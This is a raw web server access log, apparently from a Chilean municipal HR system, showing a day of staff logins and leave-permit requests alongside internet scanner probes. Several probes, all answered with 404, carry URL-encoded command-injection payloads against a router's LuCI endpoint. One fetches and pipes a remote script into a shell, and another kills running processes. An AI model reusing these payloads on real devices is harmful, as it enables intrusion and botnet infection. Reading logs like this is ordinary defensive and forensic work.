181.212.42.153 - - [26/Sep/2024:16:25:24 -0300] "POST /cormun/servlet/hlogin?e43f40a60174e43b7e003eb33a81b590,gx-no-cache=1727378695264 HTTP/1.1" 200 456
181.212.42.153 - - [26/Sep/2024:16:25:36 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1738
181.212.42.153 - - [26/Sep/2024:16:25:36 -0300] "GET /cormun/static/gxtimezone.js?85251 HTTP/1.1" 200 5781
181.212.42.153 - - [26/Sep/2024:16:25:36 -0300] "GET /cormun/static/messages.spa.js?85251 HTTP/1.1" 200 30736
181.212.42.153 - - [26/Sep/2024:16:25:36 -0300] "GET /cormun/static/gxgral.js?85251 HTTP/1.1" 200 384558
181.212.42.153 - - [26/Sep/2024:16:25:42 -0300] "POST /cormun/servlet/hlogin?e43f40a60174e43b7e003eb33a81b590,gx-no-cache=1727378713518 HTTP/1.1" 200 90
181.212.42.153 - - [26/Sep/2024:16:25:42 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 951
181.212.42.153 - - [26/Sep/2024:16:25:42 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 4339
181.212.42.153 - - [26/Sep/2024:16:25:42 -0300] "GET /cormun/static/Shared/jqueryui/jquery-ui.min.css?1345370 HTTP/1.1" 200 30288
181.212.42.153 - - [26/Sep/2024:16:25:42 -0300] "GET /cormun/static/SmoothNavMenu/resources/ddsmoothmenu.css?1112540 HTTP/1.1" 200 2223
181.212.42.153 - - [26/Sep/2024:16:25:42 -0300] "GET /cormun/static/SmoothNavMenu/resources/ddsmoothmenu-v.css?1112540 HTTP/1.1" 200 1188
181.212.42.153 - - [26/Sep/2024:16:25:42 -0300] "GET /cormun/static/scaMessage/css/jquery.pnotify.default.css?1816380 HTTP/1.1" 200 1707
181.212.42.153 - - [26/Sep/2024:16:25:42 -0300] "GET /cormun/static/PXToolsJavascripts/pexe_autoreload.js HTTP/1.1" 200 1762
181.212.42.153 - - [26/Sep/2024:16:25:42 -0300] "GET /cormun/static/PXToolsJavascripts/pexe_cookies.js HTTP/1.1" 200 792
181.212.42.153 - - [26/Sep/2024:16:25:42 -0300] "GET /cormun/static/PXToolsJavascripts/pexe_windows.js HTTP/1.1" 200 15249
181.212.42.153 - - [26/Sep/2024:16:25:42 -0300] "GET /cormun/static/PXToolsJavascripts/pexe_grid.js HTTP/1.1" 200 7559
181.212.42.153 - - [26/Sep/2024:16:25:42 -0300] "GET /cormun/static/PXToolsJavascripts/pexe_griddivfix.js HTTP/1.1" 200 6946
181.212.42.153 - - [26/Sep/2024:16:25:42 -0300] "GET /cormun/static/PXToolsJavascripts/pexe_link.js HTTP/1.1" 200 5671
181.212.42.153 - - [26/Sep/2024:16:25:42 -0300] "GET /cormun/static/PXToolsJavascripts/pexe_menudivfix.js HTTP/1.1" 200 333
181.212.42.153 - - [26/Sep/2024:16:25:42 -0300] "GET /cormun/static/PXToolsJavascripts/pexe_menus.js HTTP/1.1" 200 1286
181.212.42.153 - - [26/Sep/2024:16:25:42 -0300] "GET /cormun/static/PXToolsJavascripts/pexe_layers.js HTTP/1.1" 200 4114
181.212.42.153 - - [26/Sep/2024:16:25:42 -0300] "GET /cormun/static/PXToolsJavascripts/pexe_oav.js HTTP/1.1" 200 645
181.212.42.153 - - [26/Sep/2024:16:25:42 -0300] "GET /cormun/static/PXToolsJavascripts/pexe_oavdivfix.js HTTP/1.1" 200 639
181.212.42.153 - - [26/Sep/2024:16:25:42 -0300] "GET /cormun/static/PXToolsJavascripts/pexe_picture.js HTTP/1.1" 200 689
181.212.42.153 - - [26/Sep/2024:16:25:42 -0300] "GET /cormun/static/PXToolsJavascripts/pexe_scrolldiv.js HTTP/1.1" 200 4138
181.212.42.153 - - [26/Sep/2024:16:25:42 -0300] "GET /cormun/static/PXToolsJavascripts/pexe_tabdivfix.js HTTP/1.1" 200 898
181.212.42.153 - - [26/Sep/2024:16:25:42 -0300] "GET /cormun/static/PXToolsJavascripts/pexe_popup.js HTTP/1.1" 200 15149
181.212.42.153 - - [26/Sep/2024:16:25:42 -0300] "GET /cormun/static/PXToolsJavascripts/pexe_upload.js HTTP/1.1" 200 1423
181.212.42.153 - - [26/Sep/2024:16:25:42 -0300] "GET /cormun/static/PXToolsJavascripts/pexe_tabs.js HTTP/1.1" 200 3748
181.212.42.153 - - [26/Sep/2024:16:25:42 -0300] "GET /cormun/static/PXToolsJavascripts/PXToolsJavascriptsRender.js HTTP/1.1" 200 367
181.212.42.153 - - [26/Sep/2024:16:25:42 -0300] "GET /cormun/static/RunJS/RunJS.js HTTP/1.1" 200 288
181.212.42.153 - - [26/Sep/2024:16:25:42 -0300] "GET /cormun/static/Shared/ext/locale/ext-lang-en.js HTTP/1.1" 200 10940
181.212.42.153 - - [26/Sep/2024:16:25:42 -0300] "GET /cormun/static/Resources/PXToolsDataTitle.png HTTP/1.1" 200 1173
181.212.42.153 - - [26/Sep/2024:16:25:42 -0300] "GET /cormun/static/hwchdr01.js?2022112219251119 HTTP/1.1" 200 996
181.212.42.153 - - [26/Sep/2024:16:25:42 -0300] "GET /cormun/static/hpexe_recentlink.js?20201214471090 HTTP/1.1" 200 2144
181.212.42.153 - - [26/Sep/2024:16:25:42 -0300] "GET /cormun/static/hpexe_scripts.js?20201214471411 HTTP/1.1" 200 1544
181.212.42.153 - - [26/Sep/2024:16:25:42 -0300] "GET /cormun/static/hpexe_messagepopupcomponent.js?2020121447232 HTTP/1.1" 200 605
181.212.42.153 - - [26/Sep/2024:16:25:42 -0300] "GET /cormun/static/hpexe_messagecontroller.js?202211298371222 HTTP/1.1" 200 870
181.212.42.153 - - [26/Sep/2024:16:25:42 -0300] "GET /cormun/static/hpexe_messagegenexuscomponent.js?20221129836373 HTTP/1.1" 200 587
181.212.42.153 - - [26/Sep/2024:16:25:42 -0300] "GET /cormun/static/cmcontrolpreferences.js?20199141926336 HTTP/1.1" 200 1375
181.212.42.153 - - [26/Sep/2024:16:25:42 -0300] "GET /cormun/static/gxui/gxui-all.js HTTP/1.1" 200 107772
181.212.42.153 - - [26/Sep/2024:16:25:42 -0300] "GET /cormun/static/SmoothNavMenu/resources/ddsmoothmenu.js HTTP/1.1" 200 12712
181.212.42.153 - - [26/Sep/2024:16:25:42 -0300] "GET /cormun/static/Shared/jquery/jquery-1.4.2.min.js HTTP/1.1" 200 72174
181.212.42.153 - - [26/Sep/2024:16:25:42 -0300] "GET /cormun/static/SmoothNavMenu/resources/SmoothNavMenuRender.js HTTP/1.1" 200 5951
181.212.42.153 - - [26/Sep/2024:16:25:42 -0300] "GET /cormun/static/scaMessage/js/jquery.pnotify.min.js HTTP/1.1" 200 13038
181.212.42.153 - - [26/Sep/2024:16:25:42 -0300] "GET /cormun/static/scaMessage/scaMessageRender.js HTTP/1.1" 200 11977
181.212.42.153 - - [26/Sep/2024:16:25:42 -0300] "GET /cormun/static/hmpwkw03.js?20221129844354 HTTP/1.1" 200 3971
181.212.42.153 - - [26/Sep/2024:16:25:42 -0300] "GET /cormun/static/Shared/jqueryui/jquery-ui.min.js HTTP/1.1" 200 240427
181.212.42.153 - - [26/Sep/2024:16:25:43 -0300] "GET /cormun/static/Shared/jquery/jquery-1.10.2.min.js HTTP/1.1" 200 273199
181.212.42.153 - - [26/Sep/2024:16:25:43 -0300] "GET /cormun/static/Shared/ext/ext-all.js HTTP/1.1" 200 1289687
181.212.42.153 - - [26/Sep/2024:16:25:43 -0300] "GET /cormun/static/SmoothNavMenu/resources/images/right.gif HTTP/1.1" 200 860
181.212.42.153 - - [26/Sep/2024:16:25:45 -0300] "GET /cormun/servlet/trautorizarsolicitud? HTTP/1.1" 200 8895
181.212.42.153 - - [26/Sep/2024:16:25:45 -0300] "GET /cormun/static/calendar.js?85251 HTTP/1.1" 200 26246
181.212.42.153 - - [26/Sep/2024:16:25:45 -0300] "GET /cormun/static/calendar-es.js?85251 HTTP/1.1" 200 1901
181.212.42.153 - - [26/Sep/2024:16:25:45 -0300] "GET /cormun/static/calendar-setup.js?85251 HTTP/1.1" 200 2588
181.212.42.153 - - [26/Sep/2024:16:25:45 -0300] "GET /cormun/static/gxcfg.js?202211298474254 HTTP/1.1" 200 953
181.212.42.153 - - [26/Sep/2024:16:25:45 -0300] "GET /cormun/static/gxdec.js?85251 HTTP/1.1" 200 19579
181.212.42.153 - - [26/Sep/2024:16:25:45 -0300] "GET /cormun/static/trautorizarsolicitud.js?202211298474588 HTTP/1.1" 200 53909
181.212.43.89 - - [26/Sep/2024:16:26:48 -0300] "POST /cormun/servlet/trautorizarpermisogoce?d8487c0603d6116f2fa935effb35516a,,gx-no-cache=1727378775689 HTTP/1.1" 200 15986
181.212.43.89 - - [26/Sep/2024:16:27:15 -0300] "POST /cormun/servlet/trautorizarpermisogoce?d8487c0603d6116f2fa935effb35516a,,gx-no-cache=1727378802105 HTTP/1.1" 200 15981
190.171.142.42 - - [26/Sep/2024:16:27:19 -0300] "GET /cormun/servlet/trpermisosgoce? HTTP/1.1" 200 13784
190.171.142.42 - - [26/Sep/2024:16:27:23 -0300] "GET /cormun/static/menuarrow.gif HTTP/1.1" 404 1015
181.212.43.89 - - [26/Sep/2024:16:27:35 -0300] "POST /cormun/servlet/trautorizarpermisogoce?d8487c0603d6116f2fa935effb35516a,,gx-no-cache=1727378822280 HTTP/1.1" 200 15986
181.212.43.89 - - [26/Sep/2024:16:27:38 -0300] "POST /cormun/servlet/trautorizarpermisogoce?d8487c0603d6116f2fa935effb35516a,,gx-no-cache=1727378825064 HTTP/1.1" 200 15986
181.212.43.89 - - [26/Sep/2024:16:27:44 -0300] "POST /cormun/servlet/trautorizarpermisogoce?d8487c0603d6116f2fa935effb35516a,,gx-no-cache=1727378830927 HTTP/1.1" 200 7561
181.212.43.89 - - [26/Sep/2024:16:27:44 -0300] "GET /cormun/static/Resources/PXToolsGridFirst.gif HTTP/1.1" 200 379
181.212.43.89 - - [26/Sep/2024:16:27:44 -0300] "GET /cormun/static/Resources/PXToolsGridPrevious.gif HTTP/1.1" 200 369
190.171.142.42 - - [26/Sep/2024:16:27:44 -0300] "POST /cormun/servlet/trpermisosgoce?d9a0992120dea4036fab2dd045591a54,,gx-no-cache=1727378833793 HTTP/1.1" 200 6018
181.212.43.89 - - [26/Sep/2024:16:27:53 -0300] "POST /cormun/servlet/trautorizarpermisogoce?d8487c0603d6116f2fa935effb35516a,,gx-no-cache=1727378839806 HTTP/1.1" 200 15986
181.212.43.89 - - [26/Sep/2024:16:28:03 -0300] "POST /cormun/servlet/trautorizarpermisogoce?d8487c0603d6116f2fa935effb35516a,,gx-no-cache=1727378850439 HTTP/1.1" 200 7562
190.171.142.42 - - [26/Sep/2024:16:28:46 -0300] "POST /cormun/servlet/trpermisosgoce?d9a0992120dea4036fab2dd045591a54,,gx-no-cache=1727378895375 HTTP/1.1" 200 5494
190.171.142.42 - - [26/Sep/2024:16:28:47 -0300] "POST /cormun/servlet/trpermisosgoce?d9a0992120dea4036fab2dd045591a54,,gx-no-cache=1727378895970 HTTP/1.1" 200 5474
181.212.43.89 - - [26/Sep/2024:16:28:48 -0300] "POST /cormun/servlet/trautorizarpermisogoce?d8487c0603d6116f2fa935effb35516a,,gx-no-cache=1727378894886 HTTP/1.1" 200 112
181.212.43.89 - - [26/Sep/2024:16:28:48 -0300] "GET /cormun/AutorizarPermisoGoce-8397.xls HTTP/1.1" 200 49152
181.212.42.153 - - [26/Sep/2024:16:30:26 -0300] "POST /cormun/servlet/trautorizarsolicitud?e43f40a60174e43b7e003eb33a81b590,,gx-no-cache=1727378997263 HTTP/1.1" 200 4804
181.212.42.153 - - [26/Sep/2024:16:30:26 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-bg_highlight-soft_100_c6c2c8_1x100.png HTTP/1.1" 404 1117
181.212.42.153 - - [26/Sep/2024:16:30:26 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-icons_82798d_256x240.png HTTP/1.1" 404 1089
181.212.42.153 - - [26/Sep/2024:16:30:26 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-bg_flat_55_fafafa_40x100.png HTTP/1.1" 404 1097
181.212.42.153 - - [26/Sep/2024:16:30:26 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-icons_8d78a5_256x240.png HTTP/1.1" 404 1089
181.212.42.153 - - [26/Sep/2024:16:30:26 -0300] "POST /cormun/servlet/trautorizarsolicitud?e43f40a60174e43b7e003eb33a81b590,,gx-no-cache=1727378997387 HTTP/1.1" 200 4532
181.212.43.89 - - [26/Sep/2024:16:31:27 -0300] "GET /cormun/servlet/trautorizarpermisogoce? HTTP/1.1" 200 10178
190.171.142.26 - - [26/Sep/2024:16:31:39 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1723
190.171.142.26 - - [26/Sep/2024:16:31:39 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1734
181.212.43.89 - - [26/Sep/2024:16:31:41 -0300] "POST /cormun/servlet/trautorizarpermisogoce?d8487c0603d6116f2fa935effb35516a,,gx-no-cache=1727379068678 HTTP/1.1" 200 4427
190.171.142.26 - - [26/Sep/2024:16:31:42 -0300] "POST /cormun/servlet/hlogin?974d8774c211db7699ef583471c5da55,gx-no-cache=1727379072427 HTTP/1.1" 200 90
190.171.142.26 - - [26/Sep/2024:16:31:42 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 951
190.171.142.26 - - [26/Sep/2024:16:31:42 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 4296
181.212.43.89 - - [26/Sep/2024:16:31:44 -0300] "POST /cormun/servlet/trautorizarpermisogoce?d8487c0603d6116f2fa935effb35516a,,gx-no-cache=1727379071020 HTTP/1.1" 200 4427
181.212.43.89 - - [26/Sep/2024:16:31:44 -0300] "POST /cormun/servlet/trautorizarpermisogoce?d8487c0603d6116f2fa935effb35516a,,gx-no-cache=1727379071836 HTTP/1.1" 200 4427
181.212.43.89 - - [26/Sep/2024:16:31:45 -0300] "POST /cormun/servlet/trautorizarpermisogoce?d8487c0603d6116f2fa935effb35516a,,gx-no-cache=1727379072053 HTTP/1.1" 200 4427
181.212.43.89 - - [26/Sep/2024:16:31:45 -0300] "POST /cormun/servlet/trautorizarpermisogoce?d8487c0603d6116f2fa935effb35516a,,gx-no-cache=1727379072244 HTTP/1.1" 200 4427
181.212.43.89 - - [26/Sep/2024:16:31:45 -0300] "POST /cormun/servlet/trautorizarpermisogoce?d8487c0603d6116f2fa935effb35516a,,gx-no-cache=1727379072940 HTTP/1.1" 200 4427
181.212.43.89 - - [26/Sep/2024:16:31:46 -0300] "POST /cormun/servlet/trautorizarpermisogoce?d8487c0603d6116f2fa935effb35516a,,gx-no-cache=1727379073124 HTTP/1.1" 200 4426
181.212.43.89 - - [26/Sep/2024:16:31:46 -0300] "POST /cormun/servlet/trautorizarpermisogoce?d8487c0603d6116f2fa935effb35516a,,gx-no-cache=1727379073315 HTTP/1.1" 200 4427
181.212.43.89 - - [26/Sep/2024:16:31:46 -0300] "POST /cormun/servlet/trautorizarpermisogoce?d8487c0603d6116f2fa935effb35516a,,gx-no-cache=1727379073484 HTTP/1.1" 200 4427
181.212.43.89 - - [26/Sep/2024:16:31:46 -0300] "POST /cormun/servlet/trautorizarpermisogoce?d8487c0603d6116f2fa935effb35516a,,gx-no-cache=1727379073677 HTTP/1.1" 200 4427
181.212.43.89 - - [26/Sep/2024:16:31:47 -0300] "POST /cormun/servlet/trautorizarpermisogoce?d8487c0603d6116f2fa935effb35516a,,gx-no-cache=1727379074989 HTTP/1.1" 200 4446
181.212.43.89 - - [26/Sep/2024:16:31:49 -0300] "POST /cormun/servlet/trautorizarpermisogoce?d8487c0603d6116f2fa935effb35516a,,gx-no-cache=1727379076044 HTTP/1.1" 200 4444
190.171.142.26 - - [26/Sep/2024:16:31:49 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 15119
181.212.43.89 - - [26/Sep/2024:16:31:50 -0300] "POST /cormun/servlet/trautorizarpermisogoce?d8487c0603d6116f2fa935effb35516a,,gx-no-cache=1727379077510 HTTP/1.1" 200 4446
181.212.43.89 - - [26/Sep/2024:16:31:57 -0300] "POST /cormun/servlet/trautorizarpermisogoce?d8487c0603d6116f2fa935effb35516a,,gx-no-cache=1727379083868 HTTP/1.1" 200 15986
181.212.43.89 - - [26/Sep/2024:16:33:45 -0300] "POST /cormun/servlet/trautorizarpermisogoce?d8487c0603d6116f2fa935effb35516a,,gx-no-cache=1727379192358 HTTP/1.1" 200 7562
190.171.144.234 - - [26/Sep/2024:16:38:32 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1717
190.171.144.234 - - [26/Sep/2024:16:38:33 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1728
190.171.144.234 - - [26/Sep/2024:16:38:41 -0300] "POST /cormun/servlet/hlogin?28c66f6e50167ac7dfe0f3109cf8b676,gx-no-cache=1727379491286 HTTP/1.1" 200 90
190.171.144.234 - - [26/Sep/2024:16:38:42 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 948
190.171.144.234 - - [26/Sep/2024:16:38:42 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 3993
190.171.144.234 - - [26/Sep/2024:16:38:46 -0300] "GET /cormun/servlet/trpermisosgoce? HTTP/1.1" 200 10351
190.171.144.234 - - [26/Sep/2024:16:38:51 -0300] "GET /cormun/servlet/permisogoce?INS,0,,, HTTP/1.1" 200 6855
190.171.144.234 - - [26/Sep/2024:16:39:03 -0300] "GET /cormun/servlet/permisogoce?984dab52cc8c9c78bb8e29aa1765fbcbd555217b1bcd049935a1dfa8d5f95e6d352b557a8249f204649e7107ae72b0239d9547d3c883d673b05676436cff7150,gx-no-cache=1727379512928 HTTP/1.1" 200 80
190.171.144.234 - - [26/Sep/2024:16:39:03 -0300] "GET /cormun/static/menuarrow.gif HTTP/1.1" 404 1015
190.171.144.234 - - [26/Sep/2024:16:39:14 -0300] "POST /cormun/servlet/permisogoce?28c66f6e50167ac7dfe0f3109cf8b676,INS,0,,,,gx-no-cache=1727379524075 HTTP/1.1" 200 93
190.171.144.234 - - [26/Sep/2024:16:39:14 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1006
190.171.144.234 - - [26/Sep/2024:16:39:15 -0300] "GET /cormun/servlet/trpermisosgoce HTTP/1.1" 200 10353
181.212.43.89 - - [26/Sep/2024:16:40:14 -0300] "POST /cormun/servlet/trautorizarpermisogoce?d8487c0603d6116f2fa935effb35516a,,gx-no-cache=1727379581475 HTTP/1.1" 200 112
181.212.43.89 - - [26/Sep/2024:16:40:14 -0300] "GET /cormun/AutorizarPermisoGoce-8965.xls HTTP/1.1" 200 49152
181.212.42.153 - - [26/Sep/2024:16:41:21 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 20073
45.148.10.242 - - [26/Sep/2024:16:41:43 -0300] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 1013
154.213.184.18 - - [26/Sep/2024:16:45:48 -0300] "CONNECT example.com:443 HTTP/1.1" 400 -
190.171.153.26 - - [26/Sep/2024:16:51:53 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1743
190.171.143.82 - - [26/Sep/2024:16:52:48 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 3331
190.171.143.82 - - [26/Sep/2024:16:52:49 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1743
190.171.143.82 - - [26/Sep/2024:16:52:54 -0300] "POST /cormun/servlet/hlogin?112c0f3fc179db15680db6826b8fdae9,gx-no-cache=1727380344677 HTTP/1.1" 200 90
190.171.143.82 - - [26/Sep/2024:16:52:54 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 959
190.171.143.82 - - [26/Sep/2024:16:52:54 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 4276
190.171.143.82 - - [26/Sep/2024:16:53:00 -0300] "GET /cormun/servlet/trpermisosgoce? HTTP/1.1" 200 15256
190.171.143.82 - - [26/Sep/2024:16:53:02 -0300] "GET /cormun/static/menuarrow.gif HTTP/1.1" 404 1015
190.171.143.82 - - [26/Sep/2024:16:53:08 -0300] "POST /cormun/servlet/trpermisosgoce?112c0f3fc179db15680db6826b8fdae9,,gx-no-cache=1727380358152 HTTP/1.1" 200 16114
91.92.251.254 - - [26/Sep/2024:16:53:18 -0300] "CONNECT 45.61.137.126:7227 HTTP/1.1" 400 -
190.171.143.82 - - [26/Sep/2024:16:53:57 -0300] "POST /cormun/servlet/trpermisosgoce?112c0f3fc179db15680db6826b8fdae9,,gx-no-cache=1727380407633 HTTP/1.1" 200 5953
190.171.143.82 - - [26/Sep/2024:16:54:14 -0300] "POST /cormun/servlet/trpermisosgoce?112c0f3fc179db15680db6826b8fdae9,,gx-no-cache=1727380424590 HTTP/1.1" 200 6091
190.171.143.82 - - [26/Sep/2024:16:54:42 -0300] "POST /cormun/servlet/trpermisosgoce?112c0f3fc179db15680db6826b8fdae9,,gx-no-cache=1727380452374 HTTP/1.1" 200 5583
190.171.143.82 - - [26/Sep/2024:16:55:11 -0300] "POST /cormun/servlet/trpermisosgoce?112c0f3fc179db15680db6826b8fdae9,,gx-no-cache=1727380481990 HTTP/1.1" 200 15638
80.66.83.48 - - [26/Sep/2024:16:55:19 -0300] "CONNECT 80.66.83.48:80 HTTP/1.1" 400 -
154.213.184.25 - - [26/Sep/2024:16:57:07 -0300] "CONNECT google.com:443 HTTP/1.1" 400 -
190.171.141.138 - - [26/Sep/2024:17:00:49 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1711
190.171.141.138 - - [26/Sep/2024:17:00:49 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1722
190.171.141.138 - - [26/Sep/2024:17:00:51 -0300] "POST /cormun/servlet/hlogin?6fe343a84e30d63f616ed889161b46b4,gx-no-cache=1727380822009 HTTP/1.1" 200 90
190.171.141.138 - - [26/Sep/2024:17:00:51 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 944
190.171.141.138 - - [26/Sep/2024:17:00:51 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 4468
190.171.141.138 - - [26/Sep/2024:17:00:54 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 15593
190.171.141.138 - - [26/Sep/2024:17:00:54 -0300] "GET /cormun//static/Resources/PXTools/ActionInsert.png HTTP/1.1" 304 -
190.171.141.138 - - [26/Sep/2024:17:00:58 -0300] "GET /cormun/servlet/trpermisosgoce? HTTP/1.1" 200 15402
190.171.141.138 - - [26/Sep/2024:17:01:02 -0300] "GET /cormun/servlet/permisogoce?UPD,11671234,P,20240925141100, HTTP/1.1" 200 7420
190.171.141.138 - - [26/Sep/2024:17:01:02 -0300] "GET /cormun/servlet/permisogoce?3527d50285fe4e53e12cb6574fc8e49cc9d9d993b4aa369ac4353cf5ba807ca7efd4c55984429ab1255bc54ecc76b39f56da45e44f695bae9f0610fbbd0948d4,gx-no-cache=1727380833075 HTTP/1.1" 200 80
190.171.141.138 - - [26/Sep/2024:17:01:04 -0300] "GET /cormun/static/menuarrow.gif HTTP/1.1" 404 1015
190.171.141.138 - - [26/Sep/2024:17:01:15 -0300] "GET /cormun/servlet/permisogoce?3527d50285fe4e53e12cb6574fc8e49c574289e665a44bdb864cb783de40821b09f922225808cdec885cbda5647fc966c70506c9b42fb9118ec3e30f11a75846,gx-no-cache=1727380846120 HTTP/1.1" 200 47
190.171.141.138 - - [26/Sep/2024:17:01:18 -0300] "POST /cormun/servlet/permisogoce?6fe343a84e30d63f616ed889161b46b4,UPD,11671234,P,20240925141100,,gx-no-cache=1727380848081 HTTP/1.1" 200 93
190.171.141.138 - - [26/Sep/2024:17:01:18 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1020
190.171.141.138 - - [26/Sep/2024:17:01:18 -0300] "GET /cormun/servlet/trpermisosgoce HTTP/1.1" 200 15416
190.171.141.138 - - [26/Sep/2024:17:01:21 -0300] "GET /cormun/servlet/apermisogoceprn?11671234,P,20240925141100,PU HTTP/1.1" 200 1657
190.171.142.42 - - [26/Sep/2024:17:14:19 -0300] "POST /cormun/servlet/trpermisosgoce?d9a0992120dea4036fab2dd045591a54,,gx-no-cache=1727381623917 HTTP/1.1" 440 972
190.171.142.42 - - [26/Sep/2024:17:22:44 -0300] "GET /cormun/servlet/trpermisosgoce? HTTP/1.1" 200 6034
190.171.142.42 - - [26/Sep/2024:17:22:44 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1746
190.171.142.42 - - [26/Sep/2024:17:22:53 -0300] "POST /cormun/servlet/hlogin?977ee884ae60899df3fff975ca7edefd,gx-no-cache=1727382142010 HTTP/1.1" 200 90
190.171.142.42 - - [26/Sep/2024:17:22:53 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 960
190.171.142.42 - - [26/Sep/2024:17:22:53 -0300] "GET /cormun/servlet/trpermisosgoce HTTP/1.1" 200 13080
190.171.142.42 - - [26/Sep/2024:17:22:58 -0300] "GET /cormun/servlet/permisogoce?INS,0,,, HTTP/1.1" 200 6778
190.171.142.42 - - [26/Sep/2024:17:22:58 -0300] "GET /cormun/static/gxcfg.js?20201215124560 HTTP/1.1" 200 953
190.171.142.42 - - [26/Sep/2024:17:22:58 -0300] "GET /cormun/static/Resources/prompt.gif HTTP/1.1" 200 902
190.171.142.42 - - [26/Sep/2024:17:22:58 -0300] "GET /cormun/static/permisogoce.js?20201215124939 HTTP/1.1" 200 27790
51.255.109.164 - - [26/Sep/2024:17:32:59 -0300] "GET / HTTP/1.1" 200 11217
185.224.128.83 - - [26/Sep/2024:18:00:16 -0300] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=id%3E%60for+pid+in+%2Fproc%2F%5B0-9%5D%2A%2F%3B+do+pid%3D%24%7Bpid%25%2F%7D%3B+pid%3D%24%7Bpid%23%23%2A%2F%7D%3B+exe_path%3D%24%28ls+-l+%2Fproc%2F%24pid%2Fexe+2%3E%2Fdev%2Fnull+%7C+awk+%27%7Bprint+%24NF%7D%27%29%3B+if+%5B%5B+%24exe_path+%3D%3D+%2A%2F+%5D%5D%3B+then+kill+-9+%24pid%3B+fi%3B+done%3B%60 HTTP/1.1" 404 1013
185.224.128.83 - - [26/Sep/2024:18:00:16 -0300] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=id%3E%60wget+http%3A%2F%2F185.157.247.125%2Fe%2Ft+-O-+%7Csh%3B%60 HTTP/1.1" 404 1013
190.171.141.138 - - [26/Sep/2024:18:00:20 -0300] "GET /cormun/servlet/trpermisosgoce HTTP/1.1" 200 6040
190.171.141.138 - - [26/Sep/2024:18:00:21 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1740
87.120.166.244 - - [26/Sep/2024:18:04:54 -0300] "CONNECT google.com:443 HTTP/1.1" 400 -
185.224.128.59 - - [26/Sep/2024:18:32:10 -0300] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=id%3E%60for+pid+in+%2Fproc%2F%5B0-9%5D%2A%2F%3B+do+pid%3D%24%7Bpid%25%2F%7D%3B+pid%3D%24%7Bpid%23%23%2A%2F%7D%3B+exe_path%3D%24%28ls+-l+%2Fproc%2F%24pid%2Fexe+2%3E%2Fdev%2Fnull+%7C+awk+%27%7Bprint+%24NF%7D%27%29%3B+if+%5B%5B+%24exe_path+%3D%3D+%2A%2F+%5D%5D%3B+then+kill+-9+%24pid%3B+fi%3B+done%3B%60 HTTP/1.1" 404 1013
185.224.128.59 - - [26/Sep/2024:18:32:10 -0300] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=id%3E%60wget+http%3A%2F%2F185.157.247.125%2Fe%2Ft+-O-+%7Csh%3B%60 HTTP/1.1" 404 1013
66.249.66.3 - - [26/Sep/2024:18:32:39 -0300] "GET /cormun/static/Resources/CormunLogin.png HTTP/1.1" 304 -
165.154.172.72 - - [26/Sep/2024:19:12:19 -0300] "GET / HTTP/1.1" 200 11217
165.154.172.72 - - [26/Sep/2024:19:12:20 -0300] "òîæp­ÑuGÿd$:ÛH€{WÑÙn;<çclÇ.ZâÜçZÈ =¿¶„¾8l0ȃ(w¾*ºÑ=ˆœ?èlüózª:®&À+À/À,À0̨̩À ÀÀ" 400 -
165.154.172.72 - - [26/Sep/2024:19:12:20 -0300] "t3 12.1.2 " 400 -
186.251.203.129 - - [26/Sep/2024:19:23:58 -0300] "POST /goform/set_LimitClient_cfg HTTP/1.1" 400 -
154.213.184.25 - - [26/Sep/2024:19:40:22 -0300] "CONNECT google.com:443 HTTP/1.1" 400 -
81.244.60.114 - - [26/Sep/2024:20:02:05 -0300] "GET / HTTP/1.0" 200 11197
154.213.184.18 - - [26/Sep/2024:20:35:35 -0300] "CONNECT example.com:443 HTTP/1.1" 400 -
181.42.52.215 - - [26/Sep/2024:21:22:11 -0300] "WSgnμқ8±ÚnŽàUuփ¸>¿Iýg‡æÎ»ëÛß –äÝÆ"4>­ŽO nê"®)Mò;ÆHXñ¿oËIDçœ ::À+À/À,À0̨̩ÀÀœ/5êêê3+)ÊÊ >T Ä(‚™täŽÁ/À´Ñ"¤öz­¢ƒ×Â_+vÁ9 h2http/1.1 +ÚÚDih2servicioos.cormun.cl#-ÿ þ à £ú ¹Vñm×Á•ru=-"Ô3 ËFãæ¢†WŸ'ïÑ/ð/µ08~ ä+æ˜>.wu¡íI:Ø¢·¿©ÈuUmP·džø¬P" ìûÎÇ rÈ䋮«„wEXÚÖ¤BÂÅ]6Ð €Bò‡™°›`?/Ÿ©­¶o¸6R2Ú:Ô" 400 -
